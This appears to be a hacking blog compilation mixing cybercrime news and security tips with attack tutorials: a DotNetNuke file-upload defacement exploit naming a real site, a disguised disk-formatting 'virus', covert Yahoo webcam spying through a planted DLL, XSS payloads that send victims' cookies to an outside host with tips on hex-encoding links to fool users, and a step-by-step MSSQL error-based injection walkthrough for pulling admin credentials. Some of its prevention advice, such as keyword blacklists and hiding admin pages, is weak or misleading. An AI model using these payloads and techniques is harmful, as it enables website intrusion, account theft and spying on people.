Joint director's official mail ID hacked

BANGALORE: The Joint Director of Technical Education Department in Palace Grounds has fallen prey to hacking and email fraud. His official email ID was hacked and a number of messages were sent to a number of government employees seeking help.

Joint Director R Krishnamurthy said his official email ID created by the government department, jointdirectoredu@yahoo.com, was hacked and the password was changed. "The email ID was used for communicating with students and other government officials on official matters. All the members in the contact list have received a mail saying that I am stranded in Barcelona, Spain, and have lost my wallet and my phone. As I have no money to pay my dues of the hotel, please send 2,500 Euros," says the complaint filed by Krishnamurthy.

One of the recipients of the mail, Smitha, who is the technical assistant with the e-governance department, informed Krishnamurthy and a case was registered.

Police said a Kirloskar distributor, K Venkatesh, has complained that his email ID was hacked and obscene matters were mailed from his ID. Vidhana Soudha police have taken up the case.

A similar incident was reported in Commercial Street Police station limits, with a city-based software engineer, Niraj Sharma, complaining that his email was hacked and mail seeking financial assistance was sent to his contacts.

Taken from: expressbizz.com


Now my advice for the users 


This is an example of a weak password, nothing else. So my advice for all users is:

1. Keep your password strong, with numbers, capital letters and special characters, e.g. cr34t2r_radheR6 and so on.

2. Never share your password with others, and keep your social networking password different from your real ID password.

3. Never click on unknown links and banners. Hackers use scripts that take your password and send it to the hacker's address. This only happens when you click on those links.

4. Some websites, like way2sms, ask you to sign up before using them, so use a password other than your real password, because websites are not safe and their data can easily be dumped by hackers.

So these are some ways which we should keep in mind to be secure.

The top most password of users on internet

How to hack using dnn (Dot Net Nuke) exploit

Guys, in this post I'll show you how to hack a website using the DNN exploit.

First of all find vulnerable website using google dork:   
inurl:"/portals/0"


You can also modify this google dork according to your need & requirement

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg
 
hehehe, it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image which you want to upload, as proof that you owned the system, to SHM.jpg.

Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site




After selecting the third option, replace the URL bar with below script

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JavaScript, you will see the option for Upload Selected File. Now select your image file, which you have renamed as SHM.jpg, and upload it here. Go to the main page and refresh... THAT'S IT, you have hacked the website.



Format hard disk with Notepad

Notepad is a basic text editor you can use for simple documents or for creating Web pages. To create or edit files that require formatting, use WordPad. To open Notepad, click Start, point to All Programs, point to Accessories, and then click Notepad. But now I will show you how you can create a dangerous script in binary language to format a hard disk just by running it. First open Notepad as I showed above and type the binary value given below







Now save this under any desired name. I like password breaker.exe, because many people, when they receive this, open it without inspecting anything.

Here is the virus, ready to send; it will format the C drive of your hard disk.

Suggestion: "Do not use this hack to break the law in your country. This is for education purposes only, to show how hackers create such viruses. Also do not test this hack on your own computer or in an office where critical data is stored."


Secure your WIFI

In the Ahmedabad blasts, terrorists used an unsecured WiFi connection to send emails, and the owner of the WiFi got into trouble. So this is something related to the nation's security as well as your own. You should secure your WiFi so that no one except you can use it. Now, how do you secure your WiFi?



1. Install a Firewall. A firewall helps protect your PC by preventing unauthorized users from gaining access to your computer through the Internet or a network. It acts as a barrier that checks any information coming from the Internet or a network, and then either blocks the information or allows it to pass through to your computer.
2. Change the Administrative Password on your Wireless Routers. Each manufacturer ships their wireless routers with a default password for easy initial access. These passwords are easy to find on vendor support sites, and should therefore be changed immediately.
3. Change the Default SSID Name and Turn Off SSID Broadcasting. This will require your wireless client computers to manually enter the name of your SSID (Service Set Identifier) before they can connect to your network, greatly minimizing the damage from the casual user whose laptop is configured to connect to any available SSID broadcast it finds. You should also change the SSID name from the factory default, since these are just as well-known as the default passwords. NOTE: Even though SSID broadcasting is disabled, the SSID is included in the data packets that are transmitted and is easy to discover.
4. Disable DHCP. For a SOHO network with only a few computers, consider disabling DHCP (Dynamic Host Configuration Protocol) on your router and assigning IP addresses to your client computers manually. On newer wireless routers, you can even restrict access to the router to specific MAC addresses.
5. Replace WEP with WPA. WEP (Wired Equivalent Privacy) is a security protocol that was designed to provide a wireless computer network with a level of security and privacy comparable to what is usually expected of a wired computer network. WEP seeks to establish security by encrypting data transmitted over the wireless computer network. Data encryption protects the vulnerable wireless link between clients and access points. Once this measure has been taken, other typical wired computer network security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPNs), and authentication can be put in place to ensure privacy. Unfortunately, WEP is a very weak form of security that uses a common 60 or 108 bit key shared among all of the devices on the network to encrypt the wireless data. Hackers can access tools freely available on the Internet that can crack a WEP key in as little as 15 minutes. Once the WEP key is cracked, the network traffic instantly turns into clear text – making it easy for the hacker to treat the network like any open network. WPA (Wi-Fi Protected Access) is a powerful, standards-based, interoperable security technology for wireless computer networks. It provides strong data protection by using 128-bit encryption keys and dynamic session keys to ensure a wireless computer network's privacy and security. Many cryptographers are confident that WPA addresses all the known attacks on WEP. It also adds strong user authentication, which was absent in WEP.


Hack yahoo webcam

We always want to spy on others' webcams. So this trick will show you how to hack the Yahoo webcam of a person.


Follow the below steps to do this

1) Open the following location C:\Program Files\Yahoo!\Messenger
 
2) You will find the file ” res_msgr.dll “. Delete this file.

3) Download this cracked file from the below link

4) After Downloading it, Paste this in (C:\Program Files\Yahoo!\Messenger)
NOTE: Don’t replace the file. Delete the file first and then paste the cracked file in the same folder
Then close every thing and restart the system…

How it works?
The cracked "dll" file should be placed on the victim's computer (whose webcam you want to see). Then you go back to your system, log in to your messenger and place a "request" to see their cam. Then they will definitely press "NO"; this is the place where the crack will work. The moment they press "NO" you will start seeing them. This is the hack. Enjoy

Sql injection prevention

Guys, I found that many websites post how to hack a website by SQL injection, but no one tells how to secure your website from SQL injection. I found this post helpful, so I have posted it here.





SQL injection is still used by script kiddies, grey hats and even black hat hackers; it's the easiest way to hack into someone's website. So today in this article I will give you some tips on how to prevent SQL injection on your own or maybe your company's website.
1. Don't allow special characters
As we all know, SQL injection strings often contain special symbols, making a combination of OR and =. So try to use stored procedures instead of SELECT * FROM table name where Username="..." and Password="...", which is the common code and is vulnerable. So try to validate your code and try to avoid accepting special symbols.
2. Use Email Instead of User ID
The best way to prevent SQL injection is to use an email address as the user name. What happens here is that the code is written to validate the input in such a way that it will not accept anything other than an EMAIL address. Thus SQL injection strings are not accepted, and hence SQL injection can be prevented.
3. Try to Hide Your Admin Login Page
Well, there is no security in this universe, there is only opportunity, and if you are showing your ADMINLOGIN page link on your website then that means you are giving the opportunity to the HACKER. It's an obvious thing that SQL injection can only be done through your admin login panel (sometimes through the URL) and user login panel. So don't show your adminlogin link directly on your website.
4. Don't use default AdminLogin page
Another way to protect your website from SQL injection is to name your AdminLogin page yourself. Try to have login page links like "powerlogin.asp", "herologin.asp", meaning something different which cannot be found easily with Google hacks. So when a hacker tries to search for your admin login page he/she (for female hackers he he), he will search for adminlogin.asp, admin/login.asp, something like this, and as a result will be frustrated and hence will leave your website.
5. Social Engineering
Don't disclose your website vulnerabilities to anyone. Try to get help from GOD itself (by GOD here I mean GOOGLE). Instead of discussing your website vulnerabilities with a single person, try to search for the solutions on Google. And last but not least, have a WARNING message on your login pages, something scary like "We are using transparent proxy, do not try to HACK, otherwise legal action will be taken." That really works he he; at least before trying to hack into your website, he will think twice. So I hope this unique article will help website developers to prevent SQL injection attacks. This is the first ever article by anyone having these techniques. So please don't copy; I hope soon I will take copyright on this. Happy Hacking :)
There are a number of things you can do... I will show you a few more here for PHP developers...

Alternative one

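Let's say this is your code:
Code:
<?php

// Vulnerable: $_GET['id'] is concatenated straight into the SQL string.
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
// mysql_query() returns a result resource, so fetch the row before printing it.
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>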


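This means that you are selecting the page content, which is 'text', from 'pages' in the SQL database, and you are picking out the right page content with $_GET['id'], and $_GET['id'] is the thing in the URL... Example: http://google.com/index.php?id=123

This code is easily injectable... But if you do this:
Code:
<?php

// Escape the value AND wrap it in quotes: escaping alone does not protect an unquoted value.
$id = mysql_real_escape_string($_GET['id']);
$result = mysql_query("SELECT text FROM pages WHERE id='" . $id . "'");
// mysql_query() returns a result resource, so fetch the row before printing it.
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>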

You are 100% secure

Alternative two
This one is not as good as the first one... But still works

Again we say this is your php code:
Code:
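<?php

// Vulnerable: $_GET['id'] is concatenated straight into the SQL string.
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
// mysql_query() returns a result resource, so fetch the row before printing it.
$row = mysql_fetch_assoc($result);
echo($row['text']);

?>


Again, this is very simple to inject... But if you check $_GET['id'] for "illegal" characters! Like this: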
Code:
<?php

// Keyword blacklist: stop if the id contains any of these SQL keywords (case-insensitive).
foreach (array('union', 'select', 'information_') as $keyword) {
    if (stripos($_GET['id'], $keyword) !== false) {
        die;
    }
}

$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
// mysql_query() returns a result resource, so fetch the row before printing it.
$row = mysql_fetch_assoc($result);
echo($row['text']);

?> 
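The two alternatives above compared with a prepared statement, as an added example that is not part of the original post. It runs the post's `SELECT text FROM pages WHERE id=` query against an in-memory SQLite database through PDO; the table rows, the function names and the sample inputs are constructed for illustration, and `addslashes()` stands in for `mysql_real_escape_string()` because no MySQL connection is assumed. It shows that escaping does nothing for a value placed outside quotes, while a bound parameter is never parsed as SQL.

```php
<?php
// Added example (not from the original post). Constructed sample data in an
// in-memory SQLite database, so the script runs offline with the PDO SQLite driver.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, text TEXT)');
$pdo->exec("INSERT INTO pages (id, text) VALUES (1, 'Home'), (2, 'Contact'), (3, 'Unpublished draft')");

// The post's first listing: the raw value is concatenated into the SQL string.
function fetch_concatenated(PDO $pdo, string $id): array
{
    return $pdo->query('SELECT text FROM pages WHERE id=' . $id)
               ->fetchAll(PDO::FETCH_COLUMN);
}

// Escaping without quotes around the value. addslashes() is a stand-in for
// mysql_real_escape_string() (assumption: no MySQL server available). Both only
// touch quote, backslash and control characters, so an input made of digits,
// spaces and keywords passes through unchanged and is still parsed as SQL.
function fetch_escaped_unquoted(PDO $pdo, string $id): array
{
    return $pdo->query('SELECT text FROM pages WHERE id=' . addslashes($id))
               ->fetchAll(PDO::FETCH_COLUMN);
}

// Prepared statement: the SQL text is fixed and the value travels separately,
// so the database compares id against the whole input string as data.
function fetch_prepared(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT text FROM pages WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Strictest variant: reject anything that is not an integer, then bind it as one.
function fetch_validated(PDO $pdo, string $id): array
{
    $int = filter_var($id, FILTER_VALIDATE_INT);
    if ($int === false) {
        return [];
    }
    $stmt = $pdo->prepare('SELECT text FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $int, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal page id, and a value that changes the WHERE
// clause when it is pasted into the query text.
$inputs = ['2', '0 OR 1=1'];

foreach ($inputs as $id) {
    printf("id=%s\n", var_export($id, true));
    printf("  concatenated:      %s\n", json_encode(fetch_concatenated($pdo, $id)));
    printf("  escaped, unquoted: %s\n", json_encode(fetch_escaped_unquoted($pdo, $id)));
    printf("  prepared:          %s\n", json_encode(fetch_prepared($pdo, $id)));
    printf("  validated + bound: %s\n", json_encode(fetch_validated($pdo, $id)));
}
```

The keyword blacklist from alternative two would also let the second input through, since it contains none of the three blocked words.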



HACKING CRUX -by Rahul Tyagi

Download "Hacking Crux" written by Mr. Rahul Tyagi.



29-year-old arrested for hacking into girl’s profile

It's a warning to newbies... be aware



A youth who hacked into a girl's profile on a social networking website, and morphed her pictures and posted lewd messages, was arrested on Tuesday. The police picked up Pramod Nana Bavdekar (29) from his residence in Andheri and also seized his computer and a hard disc.

On November 8, when the girl, who rebuffed Bavdekar, tried to log in to the website, she noticed a message saying her ID was in use by another person. She consulted an expert, who told her that the profile had been hacked. After a few days, she was shocked to see her nude pictures on the profile, with the message: "I am a prostitute." She found that her bank account number and other personal details too were posted on the webpage. Recently, she received four letters through courier with similar messages and pictures, after which she lodged a complaint with the cyber division of the BKC police station. In her complaint, she mentioned that she suspected Bavdekar, a former neighbour who had proposed to her two years ago. According to the police, though the girl was being harassed for long, she filed the complaint only last week because she could not take the humiliation any longer. Bavdekar has been booked under a few provisions of the Information Technology Act and remanded in police custody till December 21.

What is Cross site scripting (XSS OR CSS)?





Guys, I got some questions from many newbies about what "cross site scripting" is and how to hack a website by XSS or CSS, so I decided to post this article. And there is one question which is usually in the mind of newbies and many normal people; I hear a lot of: What is hacking? Is there any scope in it? What to do with hacking? and many questions like these. I'm writing on this topic and will publish that article soon. So let's begin with XSS or CSS...




              
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with HTML and JavaScript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious JavaScript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.
"What does XSS and CSS mean?"

  Often people refer to Cross Site Scripting as CSS. There has been a lot of confusion with Cascading Style Sheets (CSS) and cross site scripting. Some security people refer to Cross Site Scripting as XSS. If you hear someone say "I found a XSS hole", they are talking about Cross Site Scripting for certain. 
"What are the threats of Cross Site Scripting?"

Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks. The post below by Brett Moore brings up a good point with regard to "Denial Of Service", and potential "auto-attacking" of hosts if a user simply reads a post on a message board. 
"What are some examples of cross site scripting attacks?"

One product with many XSS holes is the popular PHP program PHPnuke. This product is often targeted by attackers to probe for XSS holes because of its popularity. I have included a few links of advisories/reports that have been discovered and disclosed just from this product alone. The following collection should provide plenty of examples. 
http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
"Can you show me what XSS cookie theft looks like?"

Depending on the particular web application some of the variables and positioning of the injections may need to be adjusted. Keep in mind the following is a simple example of an attacker's methodology. In our example we will exploit a cross site scripting hole in a parameter of "a.php" called "variable" via a normal request. This is the most common type of cross site scripting hole that exists.
Step 1: Targeting
After you have found an XSS hole in a web application on a website, check to see if it issues cookies. If any part of the website uses cookies, then it is possible to steal them from its users. 
Step 2: Testing
Since XSS holes are different in how they are exploited, some testing will need to be done in order to make the output believable. By inserting code into the script, its output will be changed and the page may appear broken. (The end result is crucial and the attacker will have to do some touching up in the code to make the page appear normal.) Next you will need to insert some Javascript (or other client side scripting language) into the URL pointing to the part of the site which is vulnerable. Below I have provided a few links that are for public use when testing for XSS holes. These links below, when clicked on will send the users cookie to www.cgisecurity.com/cgi-bin/cookie.cgi and will display it. If you see a page displaying a cookie then session hijacking of the user's account may be possible.
Cookie theft Javascript Examples.
An example of usage is below.
ASCII Usage:


http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

Hex Usage:

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

NOTE: The request is for copy and paste purposes.

1. "><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
 %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

2.  <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

3.  ><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

These are the examples of "evil" Javascript we will be using. These Javascript examples gather the users cookie and then send a request to the cgisecurity.com website with the cookie in the query. My script on cgisecurity.com logs each request and each cookie. In simple terms it is doing the following:

 cookie = user=zeno; id=021
 script = www.cgisecurity.com/cgi-bin/cookie.cgi

It sends a request to site that looks like this.
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space)

This is a primitive but effective way of grabbing a user's cookie. Logs of the use of this public script can be found at www.cgisecurity.com/articles/cookie-theft.log
                                  

Step 3: XSS Execution
Hand out your crafted url or use email or other related software to help launch it. Make sure that if you provide the URL to the user(through email, aim, or other means) that you at least HEX encode it. The code is obviously suspicious looking but a bunch of hex characters may fool a few people.
For example, forward the user to cookie.cgi. An attacker with more time could do a few redirects and XSS combos to steal the user's cookie, and return them to the website without them noticing the cookie theft.
Some email programs may execute the Javascript upon the opening of a message or if the Javascript is contained in a message attachment. Larger sites like Hotmail do allow Javascript inside attachments but they do special filtering to prevent cookie theft.

Step 4: What to do with this data
Once you have gotten the user to execute the XSS hole, the data is collected and sent to your CGI script. Now that you have the cookie you can use a tool like Websleuth to see if account hijacking is possible.
This is only a FAQ, not a detailed paper on cookie theft and modification. A new paper released by David Endler of iDefense goes into more detail on some of the ways to automatically launch XSS holes. This paper can be found at http://www.idefense.com/XSS.html.

"What can I do to protect myself as a vendor?"

This is a simple answer. Never trust user input and always filter metacharacters. This will eliminate the majority of XSS attacks. Converting < and > to &lt; and &gt; is also suggested when it comes to script output. Remember XSS holes can be damaging and costly to your business if abused. Often attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of your organization's site. Filtering < and > alone will not solve all cross site scripting attacks. It is suggested you also attempt to filter out ( and ) by translating them to &#40; and &#41; , " to &quot; , ' to &#39; , and also # and & by translating them to &#35; (#) and &amp; (&). A more complete list of entities can be found at http://tntluoma.com/sidebars/codes/ .
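The translation described in this answer, applied to the FAQ's "variable" parameter of "a.php", as an added example that is not part of the original FAQ. The function names, the form field and the sample value are constructed for illustration. It implements the FAQ's entity table in a single pass, so the & and # produced by one replacement are not encoded a second time, and sets it beside PHP's built-in htmlspecialchars().

```php
<?php
// Added example (not from the FAQ). Encodes a request value before it is
// written into an HTML page.

// The FAQ's translation table: metacharacter => HTML entity.
const FAQ_ENTITY_MAP = [
    '&' => '&amp;',
    '#' => '&#35;',
    '<' => '&lt;',
    '>' => '&gt;',
    '(' => '&#40;',
    ')' => '&#41;',
    '"' => '&quot;',
    "'" => '&#39;',
];

// strtr() with an array makes one pass over the input and never rescans its
// own output. A chain of str_replace() calls would turn "<" into "&lt;" and
// then, if "&" came later in the chain, into "&amp;lt;".
function encode_faq_table(string $value): string
{
    return strtr($value, FAQ_ENTITY_MAP);
}

// PHP's built-in encoder for HTML body and quoted-attribute contexts.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function encode_builtin(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// What a vulnerable a.php does: echoes the parameter into an attribute as-is.
function render_unencoded(string $variable): string
{
    return '<input type="text" name="variable" value="' . $variable . '">';
}

// The same output with the value encoded for the attribute it lands in.
function render_encoded(string $variable): string
{
    return '<input type="text" name="variable" value="' . encode_builtin($variable) . '">';
}

// Constructed sample value. It starts with "> like the request in the FAQ,
// which closes the value attribute and the tag so that the rest is parsed as
// markup. The script body here only changes the page title.
$sample = '"><script>document.title="injected"</script>';

printf("unencoded output : %s\n", render_unencoded($sample));
printf("encoded output   : %s\n", render_encoded($sample));
printf("FAQ table        : %s\n", encode_faq_table($sample));
printf("htmlspecialchars : %s\n", encode_builtin($sample));

// Single-pass check on a value that already contains an entity-like string.
printf("FAQ table on '&lt;#1>' : %s\n", encode_faq_table('&lt;#1>'));
```

Both encoders are meant for HTML body text and quoted attribute values; a value written into a script block or a URL needs the encoding of that context instead.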

"How to protect myself as a user?"

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN's main site and use its search engine to find the content. This will probably eliminate ninety percent of the problem. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. If you plan on opening an email, or reading a post on a public board from a person you don't know BE CAREFUL. One of the best ways to protect yourself is to turn off Javascript in your browser settings. In IE turn your security settings to high. This can prevent cookie theft, and in general is a safer thing to do.

"How common are XSS holes?"
Cross site scripting holes are gaining popularity among hackers as easy holes to find in large websites. Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs. Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.

"Does encryption protect me?"

 Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection. People often think that because they see the lock on their browser it means everything is secure. This just isn't the case.
"Can XSS holes allow command execution?"

XSS holes can allow Javascript insertion, which may allow for limited execution. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client's side. If command execution were possible it would only be possible on the client side. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser.

"What if I don't feel like fixing a CSS/XSS Hole?"
 By not fixing an XSS hole this could allow possible user account compromise in portions of your site as they get added or updated. Cross Site Scripting has been found in various large sites recently and have been widely publicized. Left unrepaired, someone may discover it and publish a warning about your company. This may damage your company's reputation, depicting it as being lax on security matters. This of course also sends the message to your clients that you aren't dealing with every problem that arises, which turns into a trust issue. If your client doesn't trust you why would they wish to do business with you?
'Cross-site scripting' tears holes in Net security
Along with Microsoft, Grossman also alerted Yahoo, Amazon, America Online and others. He says their sites are equally vulnerable. WhiteHat has posted guidelines on how to eliminate the flaws on its Web site.
But experts remain concerned that cross-site scripting attacks will increase as Web services become more pervasive. The more well-known computer viruses are designed to punch through security firewalls — software that monitors network and Internet traffic and restricts access to data. Cross-site scripting works by embedding malicious code on Web pages with tiny "scripting" programs that make sites more interactive. An unsuspecting Web site visitor then activates the hacker's program by using the corrupted scripting program. Once activated, the rogue program allows the hacker to slip undetected past Web-site firewalls to read e-mail, play pranks and steal information from cookies, which store identification, credit card numbers and other data. Last week, a hacker used cross-site scripting to wipe out desktop icons of Web users visiting Price Loto, a Japanese auction site, prompting the site to temporarily shut down while a patch was devised, says Japan's Information Technology Promotion Agency.
While viruses tend to target specific computer servers — the recent "Code Red" attack, for instance, affected only computers using Microsoft's Internet Information Server — a cross-site scripting attack can lie dormant on just about any Web page. "Cross-site scripting allows a bad guy to trick an innocent guy into running code the bad guy wrote," says Lincoln Stein, a human genome researcher at Cold Spring Harbor Laboratory and author of a book on Web security.

MS sql injection tutorial

So guys, as we hacked many SQLi and MySQLi sites, now it's time to target Microsoft. In this post I'll tell you how to hack MSSQL sites...



There are various types of sql injection for MICROSOFT here as follows:



1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
Here I'm going to explain the first one, "SQL with CONVERT".
STEP 1:
 
First we need to find a vulnerable site.

By adding a single quote ('), a double quote (") or a semicolon (;) to the field under test.

eg:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

It's vulnerable to SQL injection if the output shows some error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

Also error could be something like below

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If errors like the above are shown then the site could be vulnerable to SQL injection.

Also you can find vulnerable site from google dork.

eg

inurl:age.asp?id=
inurl:index.asp?sid=
You can see SQL dorks in my old posts.
STEP 2:

Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.

Now we start with our assessment by finding MSSQL_Version, DB_name.

http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)

[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We know now it's a Microsoft SQL Server 2005 and the OS is Windows 2003 Server (Build 3790: Service Pack 2).

Let's go to enumerate DB_name.

http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The data base name is IPC.

http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The user operating the database is ipcdc....


STEP 3:

 
NOW LETS FIND TABLES IN DATABASE

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables))--

"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Therefore, we know from this error that the first table is "siteStatus". The next step is looking for the second table.
We simply append a WHERE clause to the query in the request above.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The second table is 'headerGraphic'.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
The third table is 'admin'.

Like this, you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

If the query returns something like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

IT MEANS THE DATABASE CONTAINS ONLY 3 TABLES: 'siteStatus', 'headerGraphic' AND 'admin'.


STEP 4:


Now we are all set, and we will find the columns in the admin table.

We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
but we have to add "table_name" in the WHERE clause in order to specify the table which we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

The response will be:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So the 2nd column is 'passwd'.


Do this the same way we did the URL manipulation for tables.
Don't forget to add the WHERE clause. Continue until you get an error like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------


STEP 5: RETRIEVING USERNAME AND PASSWORD etc

Now let's see what we got from above

table_name: 'admin', 'siteStatus' and 'headerGraphic'

Here we are interested in 'admin'. So we found the columns of 'admin'

